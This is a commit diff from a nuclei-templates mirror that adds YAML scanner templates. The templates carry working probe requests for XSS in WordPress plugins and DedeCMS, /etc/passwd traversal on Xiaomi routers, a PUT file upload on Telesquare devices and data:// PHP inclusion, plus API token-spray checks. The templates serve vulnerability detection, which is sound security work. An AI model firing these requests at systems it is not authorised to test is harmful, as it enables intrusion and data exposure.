daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-05-19 16:47:32 -04:00 committed by GitHub
parent f44e8d1883 737026328b
commit e83f9df9f2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
21 changed files with 356 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
.new-additions
View File

@ -0,0 +1,9 @@
cves/2013/CVE-2013-6281.yaml
cves/2018/CVE-2018-18608.yaml
cves/2019/CVE-2019-18371.yaml
cves/2021/CVE-2021-45428.yaml
cves/2022/CVE-2022-0346.yaml
exposures/files/xampp-environment-variables.yaml
token-spray/api-debounce.yaml
token-spray/api-tatum.yaml
vulnerabilities/dedecms/dedecms-config-xss.yaml

46
cves/2013/CVE-2013-6281.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2013-6281
info:
name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
author: random-robbie
severity: medium
description: |
The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
reference:
- https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
- https://www.securityfocus.com/bid/63256/
- https://wordpress.org/plugins/dhtmlxspreadsheet/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2013-6281
cwe-id: CWE-79
metadata:
google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
verified: "true"
tags: cve,cve2013,wordpress,xss,wp-plugin,wp
requests:
- raw:
- |
GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "page: '<script>alert(document.domain)</script>'"
- "dhx_rel_path"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

44
cves/2018/CVE-2018-18608.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2018-18608
info:
name: DedeCMS V5.7 - Cross Site Scripting
author: ritikchaddha
severity: medium
description: |
DedeCMS 5.7 SP2 allows XSS via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php.
reference:
- https://github.com/ky-j/dedecms/issues/8
- https://nvd.nist.gov/vuln/detail/CVE-2018-18608
- https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-18608
cwe-id: CWE-79
metadata:
shodan-query: http.html:"DedeCms"
verified: "true"
tags: dedecms,xss,cve,cve2018
requests:
- method: GET
path:
- "{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'><script>alert(document.domain)</script>"
- "DedeCMS Error Warning!"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

33
cves/2019/CVE-2019-18371.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2019-18371
info:
name: Xiaomi routers - Local file inclusion
author: ritikchaddha
severity: high
description: |
An issue was discovered on Xiaomi Mi WiFi R3G devices before 2.28.23-stable. There is a directory traversal vulnerability to read arbitrary files via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.
reference:
- https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-18371
- https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-18371
cwe-id: CWE-22
tags: xiaomi,cve2019,cve,lfi,router,mi
requests:
- method: GET
path:
- "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200

1
cves/2021/CVE-2021-27561.yaml
View File

@ -8,6 +8,7 @@ info:
reference:
- https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561
- https://ssd-disclosure.com/?p=4688
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8

2
cves/2021/CVE-2021-27905.yaml
View File

@ -5,12 +5,12 @@ info:
author: hackergautam
severity: critical
description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter.
remediation: This issue is resolved in Apache Solr 8.8.2 and later.
reference:
- https://www.anquanke.com/post/id/238201
- https://ubuntu.com/security/CVE-2021-27905
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
remediation: This issue is resolved in Apache Solr 8.8.2 and later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8

1
cves/2021/CVE-2021-28918.yaml
View File

@ -9,6 +9,7 @@ info:
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
- https://github.com/rs/node-netmask
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1

1
cves/2021/CVE-2021-30461.yaml
View File

@ -9,6 +9,7 @@ info:
reference:
- https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-30461
- https://ssd-disclosure.com/ssd-advisory--voipmonitor-unauth-rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8

1
cves/2021/CVE-2021-3129.yaml
View File

@ -9,6 +9,7 @@ info:
- https://www.ambionics.io/blog/laravel-debug-rce
- https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
- https://nvd.nist.gov/vuln/detail/CVE-2021-3129
- https://github.com/facade/ignition/pull/334
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8

2
cves/2021/CVE-2021-44515.yaml
View File

@ -11,12 +11,12 @@ info:
- https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
- https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
- https://nvd.nist.gov/vuln/detail/CVE-2021-44515
remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-44515
cwe-id: CWE-287
remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
tags: cve,cve2021,cisa,zoho,rce,manageengine
requests:

48
cves/2021/CVE-2021-45428.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2021-45428
info:
name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
author: gy741
severity: critical
description: |
TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
reference:
- https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
- http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-45428
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-45428
cwe-id: CWE-639
metadata:
shodan-query: http.html:"TLR-2005KSH"
verified: "true"
tags: cve,cve2021,telesquare,intrusive,fileupload
requests:
- raw:
- |
GET /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
- |
PUT /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
CVE-2021-45428
- |
GET /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 404 && status_code_2 == 201'
- 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
condition: and
# Enhanced by mp on 2022/05/19

2
cves/2021/CVE-2021-46422.yaml
View File

@ -10,12 +10,14 @@ info:
- https://www.exploit-db.com/exploits/50936
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?
- https://nvd.nist.gov/vuln/detail/CVE-2021-46422
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-46422
cwe-id: CWE-78
metadata:
shodan-query: html:"SDT-CW3B1"
verified: "false"
tags: cve,cve2021,injection,rce

42
cves/2022/CVE-2022-0346.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CVE-2022-0346
info:
name: Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting & RCE
author: Akincibor
severity: high
description: |
The plugin does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.
reference:
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0346
metadata:
verified: true
tags: xss,wp,wordpress,wp-plugin,cve,cve2022
requests:
- method: GET
path:
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
- "contains(body_2, '<img src onerror=alert(document.domain)>') || contains(body_2, 'Invalid Renderer type specified')"
condition: or
- type: word
part: header
words:
- text/html
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'

4
cves/2022/CVE-2022-1598.yaml → cves/2022/CVE-2022-1597.yaml
View File

@ -1,4 +1,4 @@
id: CVE-2022-1598
id: CVE-2022-1597
info:
name: WPQA < 5.4 - Reflected Cross-Site Scripting
@ -12,7 +12,7 @@ info:
- https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597
classification:
cve-id: CVE-2022-1598
cve-id: CVE-2022-1597
metadata:
verified: true
google-dork: inurl:/wp-content/plugins/wpqa

2
cves/2022/CVE-2022-30489.yaml
View File

@ -3,7 +3,7 @@ id: CVE-2022-30489
info:
name: Wavlink Wn535g3 - POST XSS
author: For3stCo1d
severity: high
severity: medium
description: |
WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi.
reference:

3
cves/2022/CVE-2022-30525.yaml
View File

@ -9,13 +9,14 @@ info:
reference:
- https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
- https://github.com/rapid7/metasploit-framework/pull/16563
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
- https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
metadata:
shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
classification:
cve-id: CVE-2022-30525
metadata:
shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
tags: rce,zyxel,cve,cve2022,firewall,unauth
requests:

30
exposures/files/xampp-environment-variables.yaml Normal file
View File

@ -0,0 +1,30 @@
id: xampp-environment-variables
info:
name: XAMPP Environment Variables Exposure
author: melbadry9,DhiyaneshDK
severity: low
tags: exposure,xampp
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/printenv.pl"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<TITLE>Environment Variables</TITLE>"
- "Environment Variables:"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

1
misconfiguration/haproxy-status.yaml
View File

@ -12,6 +12,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/haproxy-status"
- "{{BaseURL}}/haproxy?stats"
matchers-condition: and
matchers:

25
token-spray/api-debounce.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-debounce
info:
name: DeBounce API Test
author: 0ri2N
severity: info
reference:
- https://developers.debounce.io/reference/api-key-authentication
- https://debounce.io
tags: debounce,token-spray
self-contained: true
requests:
- method: GET
path:
- "https://api.debounce.io/v1/?api={{token}}&email=test@example.com"
matchers:
- type: word
part: body
words:
- '"balance":'
- '"success":'
- '"debounce":'
condition: and

28
token-spray/api-tatum.yaml Normal file
View File

@ -0,0 +1,28 @@
id: api-tatum
info:
name: Tatum API Test
author: 0ri2N
severity: info
reference:
- https://apidoc.tatum.io/#tag/Node-RPC
- https://docs.tatum.io
tags: defi,dapp,token-spray,blockchain
self-contained: true
requests:
- method: POST
path:
- "https://api-eu1.tatum.io/v3/blockchain/node/ETH/{{token}}"
headers:
Content-Type: application/json
body: "{\"jsonrpc\":\"2.0\",\"method\":\"web3_clientVersion\",\"params\":[ ],\"id\":1}"
matchers:
- type: word
part: body
words:
- '"id":'
- '"result":'
- '"jsonrpc":'
condition: and

37
vulnerabilities/dedecms/dedecms-config-xss.yaml Normal file
View File

@ -0,0 +1,37 @@
id: dedecms-config-xss
info:
name: DedeCMS V5.7 config.php XSS
author: ritikchaddha
severity: medium
description: |
DeDeCMS v5.7 has an XSS vulnerability in the '/include/dialog/config.php' file, and attackers can use this vulnerability to steal user cookies, hang horses, etc.
reference:
- https://www.zilyun.com/8665.html
- https://www.60ru.com/161.html
- https://www.cnblogs.com/milantgh/p/3615853.html
metadata:
verified: true
shodan-query: http.html:"DedeCms"
tags: dedecms,xss
requests:
- method: GET
path:
- "{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "location='../../</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200